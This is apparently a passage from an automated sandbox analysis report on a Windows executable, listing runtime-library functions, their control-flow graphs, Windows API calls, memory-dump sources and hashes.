                                                                                                                        • String ID: 1.2.13$Failed to extract %s: decompression resulted in return code %d!$Failed to extract %s: failed to allocate temporary input buffer!$Failed to extract %s: failed to allocate temporary output buffer!$Failed to extract %s: inflateInit() failed with return code %d!$malloc
                                                                                                                        • API String ID: 2030045667-1655038675
                                                                                                                        • Opcode ID: 25c9c53a6fea0ccbab253af0e80c0d64993a775ba4eb7ba4189e9803eb7794a7
                                                                                                                        • Instruction ID: e44a9acced7b9f42914c470fae8a2f7f132920ddf42179d85bd3f2aefe8629b3
                                                                                                                        • Opcode Fuzzy Hash: 25c9c53a6fea0ccbab253af0e80c0d64993a775ba4eb7ba4189e9803eb7794a7
                                                                                                                        • Instruction Fuzzy Hash: 9B51C162A0DA8285EA60BF55E4403BAEA90FB84FB4FC44135DE4D87789EF3EE545C710
                                                                                                                        Function 00007FF7C5BEAF2C Relevance: 10.8, APIs: 7, Instructions: 290COMMONLIBRARYCODE
                                                                                                                        Download Yara Rule

                                                                                                                        Control-flow Graph

                                                                                                                        • Executed
                                                                                                                        • Not Executed
                                                                                                                        control_flow_graph 660 7ff7c5beaf2c-7ff7c5beaf52 661 7ff7c5beaf54-7ff7c5beaf68 call 7ff7c5be4424 call 7ff7c5be4444 660->661 662 7ff7c5beaf6d-7ff7c5beaf71 660->662 680 7ff7c5beb35e 661->680 664 7ff7c5beb347-7ff7c5beb353 call 7ff7c5be4424 call 7ff7c5be4444 662->664 665 7ff7c5beaf77-7ff7c5beaf7e 662->665 682 7ff7c5beb359 call 7ff7c5be9db0 664->682 665->664 667 7ff7c5beaf84-7ff7c5beafb2 665->667 667->664 671 7ff7c5beafb8-7ff7c5beafbf 667->671 672 7ff7c5beafc1-7ff7c5beafd3 call 7ff7c5be4424 call 7ff7c5be4444 671->672 673 7ff7c5beafd8-7ff7c5beafdb 671->673 672->682 678 7ff7c5beb343-7ff7c5beb345 673->678 679 7ff7c5beafe1-7ff7c5beafe7 673->679 683 7ff7c5beb361-7ff7c5beb378 678->683 679->678 684 7ff7c5beafed-7ff7c5beaff0 679->684 680->683 682->680 684->672 687 7ff7c5beaff2-7ff7c5beb017 684->687 689 7ff7c5beb019-7ff7c5beb01b 687->689 690 7ff7c5beb04a-7ff7c5beb051 687->690 693 7ff7c5beb042-7ff7c5beb048 689->693 694 7ff7c5beb01d-7ff7c5beb024 689->694 691 7ff7c5beb026-7ff7c5beb03d call 7ff7c5be4424 call 7ff7c5be4444 call 7ff7c5be9db0 690->691 692 7ff7c5beb053-7ff7c5beb07b call 7ff7c5becacc call 7ff7c5be9e18 * 2 690->692 721 7ff7c5beb1d0 691->721 723 7ff7c5beb07d-7ff7c5beb093 call 7ff7c5be4444 call 7ff7c5be4424 692->723 724 7ff7c5beb098-7ff7c5beb0c3 call 7ff7c5beb754 692->724 695 7ff7c5beb0c8-7ff7c5beb0df 693->695 694->691 694->693 698 7ff7c5beb0e1-7ff7c5beb0e9 695->698 699 7ff7c5beb15a-7ff7c5beb164 call 7ff7c5bf2a3c 695->699 698->699 702 7ff7c5beb0eb-7ff7c5beb0ed 698->702 710 7ff7c5beb1ee 699->710 711 7ff7c5beb16a-7ff7c5beb17f 699->711 702->699 706 7ff7c5beb0ef-7ff7c5beb105 702->706 706->699 713 7ff7c5beb107-7ff7c5beb113 706->713 719 7ff7c5beb1f3-7ff7c5beb213 ReadFile 710->719 711->710 715 7ff7c5beb181-7ff7c5beb193 GetConsoleMode 711->715 713->699 717 7ff7c5beb115-7ff7c5beb117 713->717 715->710 720 7ff7c5beb195-7ff7c5beb19d 715->720 717->699 722 7ff7c5beb119-7ff7c5beb131 717->722 725 7ff7c5beb30d-7ff7c5beb316 GetLastError 719->725 726 7ff7c5beb219-7ff7c5beb221 719->726 720->719 728 7ff7c5beb19f-7ff7c5beb1c1 ReadConsoleW 720->728 731 7ff7c5beb1d3-7ff7c5beb1dd call 7ff7c5be9e18 721->731 722->699 732 7ff7c5beb133-7ff7c5beb13f 722->732 723->721 724->695 729 7ff7c5beb333-7ff7c5beb336 725->729 730 7ff7c5beb318-7ff7c5beb32e call 7ff7c5be4444 call 7ff7c5be4424 725->730 726->725 734 7ff7c5beb227 726->734 737 7ff7c5beb1c3 GetLastError 728->737 738 7ff7c5beb1e2-7ff7c5beb1ec 728->738 742 7ff7c5beb33c-7ff7c5beb33e 729->742 743 7ff7c5beb1c9-7ff7c5beb1cb call 7ff7c5be43b8 729->743 730->721 731->683 732->699 741 7ff7c5beb141-7ff7c5beb143 732->741 735 7ff7c5beb22e-7ff7c5beb243 734->735 735->731 745 7ff7c5beb245-7ff7c5beb250 735->745 737->743 738->735 741->699 749 7ff7c5beb145-7ff7c5beb155 741->749 742->731 743->721 751 7ff7c5beb252-7ff7c5beb26b call 7ff7c5beab44 745->751 752 7ff7c5beb277-7ff7c5beb27f 745->752 749->699 760 7ff7c5beb270-7ff7c5beb272 751->760 756 7ff7c5beb281-7ff7c5beb293 752->756 757 7ff7c5beb2fb-7ff7c5beb308 call 7ff7c5bea984 752->757 761 7ff7c5beb295 756->761 762 7ff7c5beb2ee-7ff7c5beb2f6 756->762 757->760 760->731 764 7ff7c5beb29a-7ff7c5beb2a1 761->764 762->731 765 7ff7c5beb2a3-7ff7c5beb2a7 764->765 766 7ff7c5beb2dd-7ff7c5beb2e8 764->766 767 7ff7c5beb2c3 765->767 768 7ff7c5beb2a9-7ff7c5beb2b0 765->768 766->762 770 7ff7c5beb2c9-7ff7c5beb2d9 767->770 768->767 769 7ff7c5beb2b2-7ff7c5beb2b6 768->769 769->767 771 7ff7c5beb2b8-7ff7c5beb2c1 769->771 770->764 772 7ff7c5beb2db 770->772 771->770 772->762
                                                                                                                        APIs
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 0000000C.00000002.2921336139.00007FF7C5BD1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00007FF7C5BD0000, based on PE: true
                                                                                                                        • Associated: 0000000C.00000002.2921243460.00007FF7C5BD0000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 0000000C.00000002.2921453246.00007FF7C5BFA000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 0000000C.00000002.2921519014.00007FF7C5C0D000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 0000000C.00000002.2921519014.00007FF7C5C1C000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 0000000C.00000002.2921672980.00007FF7C5C1E000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_12_2_7ff7c5bd0000_WinHex.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: _invalid_parameter_noinfo
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 3215553584-0
                                                                                                                        • Opcode ID: 184652ea66a00c646f0d6e367f8fa0d47b8fb75159f9cd0cc9461bb9675fa9ff
                                                                                                                        • Instruction ID: 1ddecbd5c25b85a4dcfa8e8158cb44743130227c19984b2b224432b8f2c769bf
                                                                                                                        • Opcode Fuzzy Hash: 184652ea66a00c646f0d6e367f8fa0d47b8fb75159f9cd0cc9461bb9675fa9ff
                                                                                                                        • Instruction Fuzzy Hash: 58C1D222A1C68781EA61AF1594402BDFFA5FF81FA0F9D4131DA4D037D2DEBEE8458721
                                                                                                                        Function 00007FF7C5BEC430 Relevance: 6.2, APIs: 4, Instructions: 218COMMON
                                                                                                                        Download Yara Rule

                                                                                                                        Control-flow Graph

                                                                                                                        • Executed
                                                                                                                        • Not Executed
                                                                                                                        control_flow_graph 850 7ff7c5bec430-7ff7c5bec455 851 7ff7c5bec723 850->851 852 7ff7c5bec45b-7ff7c5bec45e 850->852 855 7ff7c5bec725-7ff7c5bec735 851->855 853 7ff7c5bec460-7ff7c5bec492 call 7ff7c5be9ce4 852->853 854 7ff7c5bec497-7ff7c5bec4c3 852->854 853->855 857 7ff7c5bec4c5-7ff7c5bec4cc 854->857 858 7ff7c5bec4ce-7ff7c5bec4d4 854->858 857->853 857->858 860 7ff7c5bec4d6-7ff7c5bec4df call 7ff7c5beb7f0 858->860 861 7ff7c5bec4e4-7ff7c5bec4f9 call 7ff7c5bf2a3c 858->861 860->861 865 7ff7c5bec613-7ff7c5bec61c 861->865 866 7ff7c5bec4ff-7ff7c5bec508 861->866 868 7ff7c5bec670-7ff7c5bec695 WriteFile 865->868 869 7ff7c5bec61e-7ff7c5bec624 865->869 866->865 867 7ff7c5bec50e-7ff7c5bec512 866->867 870 7ff7c5bec523-7ff7c5bec52e 867->870 871 7ff7c5bec514-7ff7c5bec51c call 7ff7c5be3a20 867->871 872 7ff7c5bec6a0 868->872 873 7ff7c5bec697-7ff7c5bec69d GetLastError 868->873 874 7ff7c5bec626-7ff7c5bec629 869->874 875 7ff7c5bec65c-7ff7c5bec66e call 7ff7c5bebee8 869->875 877 7ff7c5bec53f-7ff7c5bec554 GetConsoleMode 870->877 878 7ff7c5bec530-7ff7c5bec539 870->878 871->870 880 7ff7c5bec6a3 872->880 873->872 881 7ff7c5bec62b-7ff7c5bec62e 874->881 882 7ff7c5bec648-7ff7c5bec65a call 7ff7c5bec108 874->882 897 7ff7c5bec600-7ff7c5bec607 875->897 887 7ff7c5bec60c 877->887 888 7ff7c5bec55a-7ff7c5bec560 877->888 878->865 878->877 890 7ff7c5bec6a8 880->890 883 7ff7c5bec6b4-7ff7c5bec6be 881->883 884 7ff7c5bec634-7ff7c5bec646 call 7ff7c5bebfec 881->884 882->897 891 7ff7c5bec6c0-7ff7c5bec6c5 883->891 892 7ff7c5bec71c-7ff7c5bec721 883->892 884->897 887->865 895 7ff7c5bec566-7ff7c5bec569 888->895 896 7ff7c5bec5e9-7ff7c5bec5fb call 7ff7c5beba70 888->896 898 7ff7c5bec6ad 890->898 899 7ff7c5bec6f3-7ff7c5bec6fd 891->899 900 7ff7c5bec6c7-7ff7c5bec6ca 891->900 892->855 902 7ff7c5bec574-7ff7c5bec582 895->902 903 7ff7c5bec56b-7ff7c5bec56e 895->903 896->897 897->890 898->883 907 7ff7c5bec704-7ff7c5bec713 899->907 908 7ff7c5bec6ff-7ff7c5bec702 899->908 905 7ff7c5bec6e3-7ff7c5bec6ee call 7ff7c5be4400 900->905 906 7ff7c5bec6cc-7ff7c5bec6db 900->906 909 7ff7c5bec584 902->909 910 7ff7c5bec5e0-7ff7c5bec5e4 902->910 903->898 903->902 905->899 906->905 907->892 908->851 908->907 912 7ff7c5bec588-7ff7c5bec59f call 7ff7c5bf2b08 909->912 910->880 916 7ff7c5bec5a1-7ff7c5bec5ad 912->916 917 7ff7c5bec5d7-7ff7c5bec5dd GetLastError 912->917 918 7ff7c5bec5af-7ff7c5bec5c1 call 7ff7c5bf2b08 916->918 919 7ff7c5bec5cc-7ff7c5bec5d3 916->919 917->910 918->917 923 7ff7c5bec5c3-7ff7c5bec5ca 918->923 919->910 921 7ff7c5bec5d5 919->921 921->912 923->919
                                                                                                                        APIs
                                                                                                                        • GetConsoleMode.KERNEL32(?,?,?,?,?,?,?,?,?,00000000,?,?,00000000,00000000,00007FF7C5BEC41B), ref: 00007FF7C5BEC54C
                                                                                                                        • GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,00000000,?,?,00000000,00000000,00007FF7C5BEC41B), ref: 00007FF7C5BEC5D7
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 0000000C.00000002.2921336139.00007FF7C5BD1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00007FF7C5BD0000, based on PE: true
                                                                                                                        • Associated: 0000000C.00000002.2921243460.00007FF7C5BD0000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 0000000C.00000002.2921453246.00007FF7C5BFA000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 0000000C.00000002.2921519014.00007FF7C5C0D000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 0000000C.00000002.2921519014.00007FF7C5C1C000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 0000000C.00000002.2921672980.00007FF7C5C1E000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_12_2_7ff7c5bd0000_WinHex.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: ConsoleErrorLastMode
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 953036326-0
                                                                                                                        • Opcode ID: f410d9e07cb2d854853af875ff306a0e9c9ee922f70c4cde11a48ef332fbc2ec
                                                                                                                        • Instruction ID: 2be7c41e50f4e84abfb953669dc0a5cd1c80e5ab6ec2c4695afb3436a8052244
                                                                                                                        • Opcode Fuzzy Hash: f410d9e07cb2d854853af875ff306a0e9c9ee922f70c4cde11a48ef332fbc2ec
                                                                                                                        • Instruction Fuzzy Hash: 44910922F1865289F760EF2594402BDAFA0FB15FA8F985135DE0E53684CF7EE442C720
                                                                                                                        Function 00007FF7C5BEE8DC Relevance: 6.2, APIs: 4, Instructions: 162COMMON
                                                                                                                        Download Yara Rule

                                                                                                                        Control-flow Graph

                                                                                                                        APIs
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 0000000C.00000002.2921336139.00007FF7C5BD1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00007FF7C5BD0000, based on PE: true
                                                                                                                        • Associated: 0000000C.00000002.2921243460.00007FF7C5BD0000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 0000000C.00000002.2921453246.00007FF7C5BFA000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 0000000C.00000002.2921519014.00007FF7C5C0D000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 0000000C.00000002.2921519014.00007FF7C5C1C000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 0000000C.00000002.2921672980.00007FF7C5C1E000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_12_2_7ff7c5bd0000_WinHex.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: _get_daylight$_isindst
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 4170891091-0
                                                                                                                        • Opcode ID: d5d13d1c94d14ccfec0c44e7243bbda22246c77cf8c41a11f0b86d98f8b3a05c
                                                                                                                        • Instruction ID: 0dd28cc906abdd54a4d19c235255520158fad783938cb93163371a6731f45b31
                                                                                                                        • Opcode Fuzzy Hash: d5d13d1c94d14ccfec0c44e7243bbda22246c77cf8c41a11f0b86d98f8b3a05c
                                                                                                                        • Instruction Fuzzy Hash: 14512872F046114BFB18EF64D9426BCABA1BB00B78F985239FD1E52AE5DB7DA401C710
                                                                                                                        Function 00007FF7C5BE47D4 Relevance: 6.1, APIs: 4, Instructions: 119pipeCOMMON
                                                                                                                        Download Yara Rule

                                                                                                                        Control-flow Graph

                                                                                                                        APIs
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 0000000C.00000002.2921336139.00007FF7C5BD1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00007FF7C5BD0000, based on PE: true
                                                                                                                        • Associated: 0000000C.00000002.2921243460.00007FF7C5BD0000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 0000000C.00000002.2921453246.00007FF7C5BFA000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 0000000C.00000002.2921519014.00007FF7C5C0D000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 0000000C.00000002.2921519014.00007FF7C5C1C000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 0000000C.00000002.2921672980.00007FF7C5C1E000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_12_2_7ff7c5bd0000_WinHex.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: File$ErrorHandleInformationLastNamedPeekPipeType
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 2780335769-0
                                                                                                                        • Opcode ID: 6d39917c2a5e172715dc0149da862f2fc663c363b49fcf3998972eea944cc0d9
                                                                                                                        • Instruction ID: 07151787458e66993e76b3104519da85cba224ee2bbfff6acfa8bee34958a155
                                                                                                                        • Opcode Fuzzy Hash: 6d39917c2a5e172715dc0149da862f2fc663c363b49fcf3998972eea944cc0d9
                                                                                                                        • Instruction Fuzzy Hash: AA51AF26E086428AFB14EF75D4503BDFBA1AF48FA8F988534DE0D57689DF79D4818320
                                                                                                                        Function 00007FF7C5BDB19C Relevance: 6.1, APIs: 4, Instructions: 94COMMON
                                                                                                                        Download Yara Rule

                                                                                                                        Control-flow Graph

                                                                                                                        APIs
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 0000000C.00000002.2921336139.00007FF7C5BD1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00007FF7C5BD0000, based on PE: true
                                                                                                                        • Associated: 0000000C.00000002.2921243460.00007FF7C5BD0000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 0000000C.00000002.2921453246.00007FF7C5BFA000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 0000000C.00000002.2921519014.00007FF7C5C0D000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 0000000C.00000002.2921519014.00007FF7C5C1C000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 0000000C.00000002.2921672980.00007FF7C5C1E000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_12_2_7ff7c5bd0000_WinHex.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: __scrt_acquire_startup_lock__scrt_dllmain_crt_thread_attach__scrt_get_show_window_mode__scrt_initialize_crt__scrt_release_startup_lock
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 1452418845-0
                                                                                                                        • Opcode ID: 90a7fcc3a81af5bf04ad81541e301d7d9fb9f11ea0fdd18d74326f9016f6428e
                                                                                                                        • Instruction ID: 026dfe47ce03d903363efab4ace7d5742eb7bafe95264a585b6b8ed6fffc9b89
                                                                                                                        • Opcode Fuzzy Hash: 90a7fcc3a81af5bf04ad81541e301d7d9fb9f11ea0fdd18d74326f9016f6428e
                                                                                                                        • Instruction Fuzzy Hash: 1E318C26E0C50346FA14BF6594213BDEE81BF51FA4FC44034E94D476DBDE6FA4058A71
                                                                                                                        Function 00007FF7C5BE4680 Relevance: 6.1, APIs: 4, Instructions: 90fileCOMMON
                                                                                                                        Download Yara Rule
                                                                                                                        APIs
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 0000000C.00000002.2921336139.00007FF7C5BD1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00007FF7C5BD0000, based on PE: true
                                                                                                                        • Associated: 0000000C.00000002.2921243460.00007FF7C5BD0000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 0000000C.00000002.2921453246.00007FF7C5BFA000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 0000000C.00000002.2921519014.00007FF7C5C0D000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 0000000C.00000002.2921519014.00007FF7C5C1C000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 0000000C.00000002.2921672980.00007FF7C5C1E000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_12_2_7ff7c5bd0000_WinHex.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: CloseCreateFileHandle_invalid_parameter_noinfo
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 1279662727-0
                                                                                                                        • Opcode ID: aa6a3d9890cc6a7f195a6e990ba186583f2f0d5ddde8471eaaef5ef51b0941e7
                                                                                                                        • Instruction ID: 6a8e3ac4c5099543f59ba7b30bf9b8b5319fbc0aa928ea7c9c79197ac65cce72
                                                                                                                        • Opcode Fuzzy Hash: aa6a3d9890cc6a7f195a6e990ba186583f2f0d5ddde8471eaaef5ef51b0941e7
                                                                                                                        • Instruction Fuzzy Hash: 6F41D522E1878183E714AF219500379EB60FB95B74F549334EA6C03AD5DFBDE5E08750
                                                                                                                        Function 00007FF7C5BDF39C Relevance: 3.2, APIs: 2, Instructions: 177COMMONLIBRARYCODE
                                                                                                                        Download Yara Rule
                                                                                                                        APIs
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 0000000C.00000002.2921336139.00007FF7C5BD1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00007FF7C5BD0000, based on PE: true
                                                                                                                        • Associated: 0000000C.00000002.2921243460.00007FF7C5BD0000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 0000000C.00000002.2921453246.00007FF7C5BFA000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 0000000C.00000002.2921519014.00007FF7C5C0D000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 0000000C.00000002.2921519014.00007FF7C5C1C000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 0000000C.00000002.2921672980.00007FF7C5C1E000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_12_2_7ff7c5bd0000_WinHex.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: _invalid_parameter_noinfo
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 3215553584-0
                                                                                                                        • Opcode ID: e6b31fcbb010569d964db91d6e465c54053a5eb593f9b70391a20bf1ad845ba7
                                                                                                                        • Instruction ID: d1bef9ff0b738b11501e5b7169ee6faa68031e391637bc179efb0b0fc1fba7af
                                                                                                                        • Opcode Fuzzy Hash: e6b31fcbb010569d964db91d6e465c54053a5eb593f9b70391a20bf1ad845ba7
                                                                                                                        • Instruction Fuzzy Hash: F351E961B0D68286EA68BF25944067AEA91BF44FF8F984734DD6D477CDCF3EE4018620
                                                                                                                        Function 00007FF7C5BEB604 Relevance: 3.0, APIs: 2, Instructions: 46COMMONLIBRARYCODE
                                                                                                                        Download Yara Rule
                                                                                                                        APIs
                                                                                                                        • SetFilePointerEx.KERNELBASE(?,?,?,?,00000000,00007FF7C5BEB79D), ref: 00007FF7C5BEB650
                                                                                                                        • GetLastError.KERNEL32(?,?,?,?,00000000,00007FF7C5BEB79D), ref: 00007FF7C5BEB65A
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 0000000C.00000002.2921336139.00007FF7C5BD1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00007FF7C5BD0000, based on PE: true
                                                                                                                        • Associated: 0000000C.00000002.2921243460.00007FF7C5BD0000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 0000000C.00000002.2921453246.00007FF7C5BFA000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 0000000C.00000002.2921519014.00007FF7C5C0D000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 0000000C.00000002.2921519014.00007FF7C5C1C000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 0000000C.00000002.2921672980.00007FF7C5C1E000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_12_2_7ff7c5bd0000_WinHex.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: ErrorFileLastPointer
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 2976181284-0
                                                                                                                        • Opcode ID: ff2257711b1d275b862e663729d543ef4812b290fbf882e2e1232765a84f7875
                                                                                                                        • Instruction ID: 168030f2688e4f029ebd23d68c59afd8406f54ed8549f26a8f74ab4326adc91d
                                                                                                                        • Opcode Fuzzy Hash: ff2257711b1d275b862e663729d543ef4812b290fbf882e2e1232765a84f7875
                                                                                                                        • Instruction Fuzzy Hash: 7C118F62A18B8285DA10AF25F404169EB61FB85FF4F984331EABD077E9CFBDD0518740
                                                                                                                        Function 00007FF7C5BE497C Relevance: 3.0, APIs: 2, Instructions: 40timeCOMMON
                                                                                                                        Download Yara Rule
                                                                                                                        APIs
                                                                                                                        • FileTimeToSystemTime.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,00007FF7C5BE4891), ref: 00007FF7C5BE49AF
                                                                                                                        • SystemTimeToTzSpecificLocalTime.KERNELBASE(?,?,?,?,?,?,?,?,?,?,?,?,?,?,00007FF7C5BE4891), ref: 00007FF7C5BE49C5
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 0000000C.00000002.2921336139.00007FF7C5BD1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00007FF7C5BD0000, based on PE: true
                                                                                                                        • Associated: 0000000C.00000002.2921243460.00007FF7C5BD0000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 0000000C.00000002.2921453246.00007FF7C5BFA000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 0000000C.00000002.2921519014.00007FF7C5C0D000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 0000000C.00000002.2921519014.00007FF7C5C1C000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 0000000C.00000002.2921672980.00007FF7C5C1E000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_12_2_7ff7c5bd0000_WinHex.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: Time$System$FileLocalSpecific
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 1707611234-0
                                                                                                                        • Opcode ID: 42d85f7bbfb38a33647f37402af2049ec243a38652db21839daf1665d9964160
                                                                                                                        • Instruction ID: 4682bec1fc50fbb88b7472f5c1787bb8299ca6c61d80641a54a3b7f353c3f9df
                                                                                                                        • Opcode Fuzzy Hash: 42d85f7bbfb38a33647f37402af2049ec243a38652db21839daf1665d9964160
                                                                                                                        • Instruction Fuzzy Hash: 7611A37260C64282EB64AF15A41113EFB60FB85F71F901235F69E819D8EF6ED048DB20
                                                                                                                        Function 00007FF7C5BE9E18 Relevance: 3.0, APIs: 2, Instructions: 19memoryCOMMONLIBRARYCODE
                                                                                                                        Download Yara Rule
                                                                                                                        APIs
                                                                                                                        • RtlFreeHeap.NTDLL(?,?,?,00007FF7C5BF1E42,?,?,?,00007FF7C5BF1E7F,?,?,00000000,00007FF7C5BF2345,?,?,?,00007FF7C5BF2277), ref: 00007FF7C5BE9E2E
                                                                                                                        • GetLastError.KERNEL32(?,?,?,00007FF7C5BF1E42,?,?,?,00007FF7C5BF1E7F,?,?,00000000,00007FF7C5BF2345,?,?,?,00007FF7C5BF2277), ref: 00007FF7C5BE9E38
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 0000000C.00000002.2921336139.00007FF7C5BD1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00007FF7C5BD0000, based on PE: true
                                                                                                                        • Associated: 0000000C.00000002.2921243460.00007FF7C5BD0000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 0000000C.00000002.2921453246.00007FF7C5BFA000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 0000000C.00000002.2921519014.00007FF7C5C0D000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 0000000C.00000002.2921519014.00007FF7C5C1C000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 0000000C.00000002.2921672980.00007FF7C5C1E000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_12_2_7ff7c5bd0000_WinHex.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: ErrorFreeHeapLast
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 485612231-0
                                                                                                                        • Opcode ID: 875bb2537aa3df01b4a1e34b7b101e94a2dc47b4cb64fa0c1180c15e07a79d81
                                                                                                                        • Instruction ID: 494b14187b0b1a6451765c43983435aa15d7d2587a37a94c2e0a42a33da3d120
                                                                                                                        • Opcode Fuzzy Hash: 875bb2537aa3df01b4a1e34b7b101e94a2dc47b4cb64fa0c1180c15e07a79d81
                                                                                                                        • Instruction Fuzzy Hash: 3DE08C54F0860382FF18BFB2A84903ADA619F84F60BC84034CA0D46252EE6EA8498330
                                                                                                                        Function 00007FF7C5BEA028 Relevance: 2.6, APIs: 2, Instructions: 59COMMON
                                                                                                                        Download Yara Rule
                                                                                                                        APIs
                                                                                                                        • CloseHandle.KERNELBASE(?,?,?,00007FF7C5BE9EA5,?,?,00000000,00007FF7C5BE9F5A), ref: 00007FF7C5BEA096
                                                                                                                        • GetLastError.KERNEL32(?,?,?,00007FF7C5BE9EA5,?,?,00000000,00007FF7C5BE9F5A), ref: 00007FF7C5BEA0A0
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 0000000C.00000002.2921336139.00007FF7C5BD1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00007FF7C5BD0000, based on PE: true
